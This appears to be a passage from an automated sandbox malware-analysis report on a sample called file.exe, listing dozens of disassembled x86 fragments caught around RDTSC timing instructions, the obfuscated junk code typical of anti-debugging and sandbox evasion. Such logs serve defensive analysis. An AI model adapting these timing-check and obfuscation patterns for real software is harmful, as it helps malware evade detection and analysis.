    0x00000072 add eax, dword ptr [esp+24h]
    0x00000076 cld
    0x00000077 cmc
    0x00000078 mov ebx, dword ptr [esp+24h]
    0x0000007c jnl 00007F0F04CBD322h
    0x00000082 push eax
    0x00000083 pushad
    0x00000084 push eax
    0x00000085 push edx
    0x00000086 push eax
    0x00000087 push edx
    0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11FDB3C second address: 11FDB40 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137CBCF second address: 137CBD3 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 137BAFF second address: 137BB03 instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BB03 second address: 137BB1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD325h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BB1E second address: 137BB23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BC8F second address: 137BC95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BC95 second address: 137BC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BC9B second address: 137BCA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0F04CBD316h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BCA7 second address: 137BCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137BE12 second address: 137BE39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Ah 0x00000007 push esi 0x00000008 jmp 00007F0F04CBD328h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C256 second address: 137C265 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C265 second address: 137C26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137C26B second address: 137C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DFA3 second address: 137DFB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DFB1 second address: 137E01D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 3E88A8FCh 0x00000012 mov dword ptr [ebp+122D234Dh], edi 0x00000018 push 00000003h 0x0000001a mov ch, al 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F0F0527E408h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 jmp 00007F0F0527E415h 0x0000003d push 00000003h 0x0000003f mov si, A873h 0x00000043 push ABB3C9A3h 0x00000048 push edx 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E01D second address: 137E048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 6BB3C9A3h 0x0000000d mov dword ptr [ebp+122D21E9h], ebx 0x00000013 lea ebx, dword ptr [ebp+12453E1Ah] 0x00000019 pushad 0x0000001a xor ah, 00000047h 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 js 00007F0F04CBD316h 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0C0 second address: 137E0DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E416h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0DA second address: 137E0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0DF second address: 137E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F0527E406h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E0F1 second address: 137E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F0F04CBD318h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D3898h] 0x00000029 xor dx, E5B2h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F0F04CBD318h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov edi, ebx 0x0000004c push A02F51E2h 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0F04CBD31Ah 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E15D second address: 137E1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a add dword ptr [esp], 5FD0AE9Eh 0x00000011 push 00000003h 0x00000013 mov dword ptr [ebp+122D2AC3h], edx 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2E07h], ecx 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F0F0527E408h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d mov si, 2B17h 0x00000041 mov di, si 0x00000044 push A07DFA96h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E1B7 second address: 137E1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E29A second address: 137E2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Dh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E2AE second address: 137E322 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c mov ebx, dword ptr [ebp+122D3780h] 0x00000012 and edi, dword ptr [ebp+122D21E9h] 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c mov edx, dword ptr [ebp+122D38A4h] 0x00000022 pop edi 0x00000023 push 7B65ECA4h 0x00000028 push esi 0x00000029 jnc 00007F0F04CBD318h 0x0000002f pop esi 0x00000030 xor dword ptr [esp], 7B65EC24h 0x00000037 jmp 00007F0F04CBD325h 0x0000003c xor edi, dword ptr [ebp+122D3A58h] 0x00000042 push 00000003h 0x00000044 mov edx, dword ptr [ebp+122D384Ch] 0x0000004a push 00000000h 0x0000004c push 00000003h 0x0000004e mov esi, dword ptr [ebp+122D379Ch] 0x00000054 call 00007F0F04CBD319h 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E322 second address: 137E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137E329 second address: 137E3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD326h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F04CBD31Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F0F04CBD31Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0F04CBD322h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 jmp 00007F0F04CBD329h 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f popad 0x00000030 pop eax 0x00000031 mov dword ptr [ebp+122D2B3Ah], edx 0x00000037 lea ebx, dword ptr [ebp+12453E2Eh] 0x0000003d xor dword ptr [ebp+122D2A5Ch], esi 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F0F04CBD31Eh 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390661 second address: 1390665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139F198 second address: 139F1F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD328h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F04CBD328h 0x0000000e jnp 00007F0F04CBD318h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push edi 0x00000017 jo 00007F0F04CBD316h 0x0000001d pop edi 0x0000001e popad 0x0000001f push ecx 0x00000020 jmp 00007F0F04CBD324h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D7FE second address: 139D804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139D804 second address: 139D808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DBCF second address: 139DBD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DD94 second address: 139DDA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DDA8 second address: 139DDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139DDAE second address: 139DDB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E065 second address: 139E089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0F0527E418h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E089 second address: 139E08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1396515 second address: 1396519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13714B4 second address: 13714BE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E33F second address: 139E353 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F0527E40Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E353 second address: 139E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E914 second address: 139E91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E91A second address: 139E921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E921 second address: 139E93E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F0527E411h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139E93E second address: 139E948 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EC11 second address: 139EC19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EC19 second address: 139EC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139EC1F second address: 139EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139ED6D second address: 139ED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0F04CBD325h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007F0F04CBD316h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F04CBD31Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A25E9 second address: 13A25ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368DB0 second address: 1368DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374D0B second address: 1374D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB8E8 second address: 13AB902 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F04CBD324h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AB902 second address: 13AB906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ABBF8 second address: 13ABC2A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 je 00007F0F04CBD316h 0x00000016 jmp 00007F0F04CBD31Ah 0x0000001b jl 00007F0F04CBD316h 0x00000021 popad 0x00000022 jmp 00007F0F04CBD31Bh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ABEE6 second address: 13ABEEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC1BA second address: 13AC1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC1BE second address: 13AC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC1C6 second address: 13AC204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0F04CBD316h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F0F04CBD31Ch 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0F04CBD31Ch 0x0000001a jmp 00007F0F04CBD326h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AC204 second address: 13AC215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0F0527E406h 0x00000009 jnc 00007F0F0527E406h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD7ED second address: 13AD7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AD7F3 second address: 13AD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADD4A second address: 13ADD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADE1E second address: 13ADE24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADEE6 second address: 13ADEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADEEE second address: 13ADF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F0527E40Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1A4 second address: 13AE1AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1AE second address: 13AE1B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F0527E40Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1B8 second address: 13AE1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0F04CBD316h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE1C8 second address: 13AE1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE299 second address: 13AE29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE371 second address: 13AE376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE99C second address: 13AE9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE9A0 second address: 13AE9B2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F0F0527E406h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE9B2 second address: 13AE9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AE9B6 second address: 13AEA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0F0527E408h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D37D4h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2ABEh], edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F0F0527E408h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D3394h], ecx 0x00000052 sub dword ptr [ebp+122D2AE5h], edx 0x00000058 xchg eax, ebx 0x00000059 push ecx 0x0000005a jo 00007F0F0527E40Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AEA21 second address: 13AEA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B12BD second address: 13B1364 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F0F0527E408h 0x00000010 popad 0x00000011 nop 0x00000012 adc edi, 4C01FE11h 0x00000018 push esi 0x00000019 mov edi, dword ptr [ebp+122D1F9Ah] 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F0F0527E408h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c call 00007F0F0527E40Bh 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F0F0527E408h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, 77939EEFh 0x00000063 mov si, DEFDh 0x00000067 xchg eax, ebx 0x00000068 jmp 00007F0F0527E411h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F0F0527E40Dh 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B1364 second address: 13B136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2A2C second address: 13B2A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2A3D second address: 13B2A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C405 second address: 136C419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
